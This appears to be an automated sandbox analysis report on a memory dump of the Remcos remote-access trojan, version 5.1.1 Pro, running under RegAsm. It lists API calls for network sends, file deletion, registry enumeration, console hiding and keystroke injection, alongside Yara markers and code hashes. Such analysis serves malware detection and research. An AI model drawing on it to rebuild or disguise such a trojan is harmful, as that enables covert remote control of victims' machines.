                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                • String ID: dMG$|MG$PG
                                                                • API String ID: 1356121797-532278878
                                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                • String ID: Remcos
                                                                • API String ID: 1970332568-165870891
                                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                APIs
                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                • __freea.LIBCMT ref: 00454083
                                                                • __freea.LIBCMT ref: 0045408F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                • String ID:
                                                                • API String ID: 201697637-0
                                                                • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                APIs
                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 1454806937-0
                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                • _free.LIBCMT ref: 00445515
                                                                • _free.LIBCMT ref: 0044552E
                                                                • _free.LIBCMT ref: 00445560
                                                                • _free.LIBCMT ref: 00445569
                                                                • _free.LIBCMT ref: 00445575
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                • String ID: C
                                                                • API String ID: 1679612858-1037565863
                                                                • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tcp$udp
                                                                • API String ID: 0-3725065008
                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                • String ID: PkG$XMG$NG$NG
                                                                • API String ID: 1649129571-3151166067
                                                                • Opcode ID: ad24df347d0372f3bcd0a455a481e024bc46b11d98dd265ab576ac300c6fc75c
                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                • Opcode Fuzzy Hash: ad24df347d0372f3bcd0a455a481e024bc46b11d98dd265ab576ac300c6fc75c
                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                • String ID: .part
                                                                • API String ID: 1303771098-3499674018
                                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                APIs
                                                                • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$Window$AllocOutputShow
                                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                • API String ID: 4067487056-3820604032
                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3864826663-0
                                                                • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                APIs
                                                                • SendInput.USER32 ref: 00419A25
                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InputSend$Virtual
                                                                • String ID:
                                                                • API String ID: 1167301434-0
                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16_free
                                                                • String ID: a/p$am/pm$h{D
                                                                • API String ID: 2936374016-2303565833
                                                                • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                APIs
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • _free.LIBCMT ref: 00444E87
                                                                • _free.LIBCMT ref: 00444E9E
                                                                • _free.LIBCMT ref: 00444EBD
                                                                • _free.LIBCMT ref: 00444ED8
                                                                • _free.LIBCMT ref: 00444EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$AllocateHeap
                                                                • String ID: KED
                                                                • API String ID: 3033488037-2133951994
                                                                • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                APIs
                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Enum$InfoQueryValue
                                                                • String ID: [regsplt]$xUG$TG
                                                                • API String ID: 3554306468-1165877943
                                                                • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                • __fassign.LIBCMT ref: 1000954F
                                                                • __fassign.LIBCMT ref: 1000956A
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                • __fassign.LIBCMT ref: 0044B514
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                • String ID: xUG$NG$NG$TG
                                                                • API String ID: 3114080316-2811732169
                                                                • Opcode ID: 98ed44dc4caea9a8c226c7cdff5212121b7baccb751d051fcbcdd94b1bfdfefb
